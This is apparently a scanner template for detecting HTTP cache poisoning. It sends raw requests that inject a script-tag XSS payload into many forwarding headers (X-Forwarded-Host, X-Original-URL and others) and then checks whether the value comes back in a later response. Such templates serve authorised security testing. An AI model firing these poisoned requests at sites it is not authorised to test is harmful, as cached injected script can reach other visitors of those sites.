id: Cache_checking

info:
  name: HTTP Cache Poisoning
  author: Excis3
  severity: medium
  description: Checking for caching issues

requests:
  - raw:
      - |
        GET /?cb=1337 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/; 127.0.0.1
        Accept: */*
        X-Forwarded-Prefix: 127.0.0.1/"></script><script>alert(document.domain);</script>
        X-Forwarded-Host: 127.0.0.1/"></script><script>alert(document.domain);</script>
        X-Forwarded-For: 127.0.0.1/"></script><script>alert(document.domain);</script>
        X-Originating-IP: 127.0.0.1/"></script><script>alert(document.domain);</script>
        X-Remote-IP: 127.0.0.1/"></script><script>alert(document.domain);</script>
        X-Remote-Addr: 127.0.0.1/"></script><script>alert(document.domain);</script>
        X-Client-IP: 127.0.0.1/"></script><script>alert(document.domain);</script>
        X-Original-URL: 127.0.0.1/"></script><script>alert(document.domain);</script>
        X-Rewrite-URL: 127.0.0.1/"></script><script>alert(document.domain);</script>
        X-forwarded-origin: 127.0.0.1/"></script><script>alert(document.domain);</script>
        X-forwarded-server: 127.0.0.1/"></script><script>alert(document.domain);</script>

      - |
        GET /cb=1337 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/; 127.0.0.1
        Accept: */*
        X-Forwarded-Prefix: 127.0.0.1/"></script><script>alert(document.domain);</script>
        X-Forwarded-Host: 127.0.0.1/"></script><script>alert(document.domain);</script>
        X-Forwarded-For: 127.0.0.1/"></script><script>alert(document.domain);</script>
        X-Originating-IP: 127.0.0.1/"></script><script>alert(document.domain);</script>
        X-Remote-IP: 127.0.0.1/"></script><script>alert(document.domain);</script>
        X-Remote-Addr: 127.0.0.1/"></script><script>alert(document.domain);</script>
        X-Client-IP: 127.0.0.1/"></script><script>alert(document.domain);</script>
        X-Original-URL: 127.0.0.1/"></script><script>alert(document.domain);</script>
        X-Rewrite-URL: 127.0.0.1/"></script><script>alert(document.domain);</script>
        X-forwarded-origin: 127.0.0.1/"></script><script>alert(document.domain);</script>
        X-forwarded-server: 127.0.0.1/"></script><script>alert(document.domain);</script>

      - |
        GET /cb=1337 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/; 127.0.0.1
        Accept: */*
        X-Forwarded-Prefix: 127.0.0.1/"></script><script>alert(document.domain);</script>
        X-Forwarded-Host: 127.0.0.1/"></script><script>alert(document.domain);</script>
        X-Forwarded-For: 127.0.0.1/"></script><script>alert(document.domain);</script>
        X-Originating-IP: 127.0.0.1/"></script><script>alert(document.domain);</script>
        X-Remote-IP: 127.0.0.1/"></script><script>alert(document.domain);</script>
        X-Remote-Addr: 127.0.0.1/"></script><script>alert(document.domain);</script>
        X-Client-IP: 127.0.0.1/"></script><script>alert(document.domain);</script>
        X-Original-URL: 127.0.0.1/"></script><script>alert(document.domain);</script>
        X-Rewrite-URL: 127.0.0.1/"></script><script>alert(document.domain);</script>
        X-forwarded-origin: 127.0.0.1/"></script><script>alert(document.domain);</script>
        X-forwarded-server: 127.0.0.1/"></script><script>alert(document.domain);</script>

      - |
        GET /?cb=1337 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/; 127.0.0.1
        Accept: */*

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "127.0.0.1") == true'